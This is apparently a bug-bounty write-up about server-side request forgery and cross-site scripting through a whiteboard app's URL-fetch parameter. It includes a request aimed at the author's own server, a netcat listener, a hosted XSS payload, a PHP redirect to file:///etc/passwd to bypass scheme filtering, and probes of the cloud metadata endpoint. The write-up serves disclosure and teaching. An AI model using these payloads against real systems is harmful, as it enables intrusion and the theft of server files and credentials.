“Exploiting a Single Parameter”
Hello There Friends and All Community Members. It's been Ages Since i Did a Write Up As I like to Work Silently. From Past few Days i have seen many write ups while scrolling my Facebook News Feed , So I also thought to do a Write Up and Contribute to this Great Community. Enough of The Boring Words , Now Let's Come to the Point :P
I Hunted in a HackerOne Private Program And found Many Low-Medium Bugs and Left the site As most of the Hunters Do :D , After Few Days i was going through the website there was a Web app of Whiteboard Sketching that was running on Flash. *Ughh ! Why I Didn’t See this Before :/* .
As you Guys Know Most of this Online White Board Softwares Have Features like Add Image , Upload Video and Etc. Having a Hacker’s Mindset We go After finding the IMPORT BY URL Feature , So i also Got an Idea to Look for it
After I Found the Import by Url Parameter I Immediately Fired Up My Server And Passed this Request :
GET /fetch?token=a20378e1_6185_11e6_b4b0_0b0c74443f0c&url=http://54.213.234.107:11111 HTTP/1.1
Host: Site.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:47.0) Gecko/20100101 Firefox/47.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Referer: [REDACTED]
Cookie: [COOKIES HERE] Connection: keep-alive
Response In my Terminal :
hishammir@hishammir:~$ nc -v -l 11111
Listening on [0.0.0.0] (family 0, port 11111)
Connection from [54.xxx.xxx.xxx] port 11111 [tcp/*] accepted (family 2, sport 41400)
So a possibility of SSRF was there , I also tried scanning external host’s Ports to Differentiate between open and closed ports. I used Scanme.nmap.org
In which Port 22 is Opened :
Response on Hitting a Closed Port :
Response on Hitting a Open Port :
So To Exploit it further I started checking on Which Protocols it was Performing Connections and Sadly it was only HTTP & HTTPS, So no SSRF:(
As the Image Fetch Endpoint was on GET Request i had a quick thought of Opening the Endpoint URL in the browser :
/fetch?token=a20378e1_6185_11e6_b4b0_0b0c74443f0c&url=http://54.213.234.107:11111
So the URL Parameter Here was fetching the Data from The URL i gave and executing it Locally , As an Example i wrote google.com in URL parameter and Google Homepage was loaded locally. So Moving Forward I tried finding XSS using the URL parameter and all i was getting a Invalid URL error :/
As i thought that the URL parameter is Fetching the source code of the website we provide , So Why not Let him fetch him some JS :P
So what i did was i created a html file with this simple xss payload and hosted it on my Server.
<script>alert(document.domain)</script>
The Result was :
Same like this I created a simple php file with the below code and hosted on my Server and gave it to the URL parameter to fetch it and execute.
<?php
header(‘Set-Cookie: Game over’);
?>
Response :
Many of You guys must be thinking why this noob is not trying for the RCE :D
After all this I did try hard for RCE or Reading Server Files , So what I did to achieve RCE ?
Next, i fiddled with different schemes but http, https were only possible, $_POST was blocked too, hence gopher:// file:// dict:// seems to be blocked, But by utilising the same Fact of Resource Sharing i created a script like :
<?php
header(‘Location: file:///etc/passwd’);
?>
That would bypass the Initial file:// scheme blocking restriction and server would itself go to search for file:///etc/passwd which Gives Internal Server Error, hence that was strong motivation that Brute forcing the header with traversal of path just like
header(‘Location site.com/../../etc/passwd);
or many more enumeration could have resulted into successful reading ..it requires time to enumerate. But no Luck :/
Next, what i thought had the Strongest relevance was Out of Band Data Exfiltration, I used my own server As “HTTP” was working fine, i retrieved data , which i received in Chunks from an “Internal Server” whose IP was 54.82.xxx.xxx .. That is Strong signal of OOB .
So They were using ec2 instance on 54.82.xxx.xxx from which i received chunks But the common ports were closed of the server and it was opening 80 once requested file_get_contents(); So utilising this, I tried Reading EC2 Instances of their Internal server using the URL parameter but there was some type of Whitelisting or what !
For example: https://75.101.xxx.xx/latest/user-data/ if i opened simply in browser isn’t publicly accessible but if u put in url= parameter than the response was different , Similarly , I tried retrieving IP’s of the website via NslookUP and tried Accessing the IP’s putting them in the URL parameter hoping to Hit a Intranet Maybe ?
For all the Bounty Conscious Guys , A Bounty of $2.5k Was rewarded for the Issue.
For Past Blog Posts Do Visit our Blog blog.securitywall.co
Thank Uh Guys For Reading this!
Drop your comments below if you have a question ;)
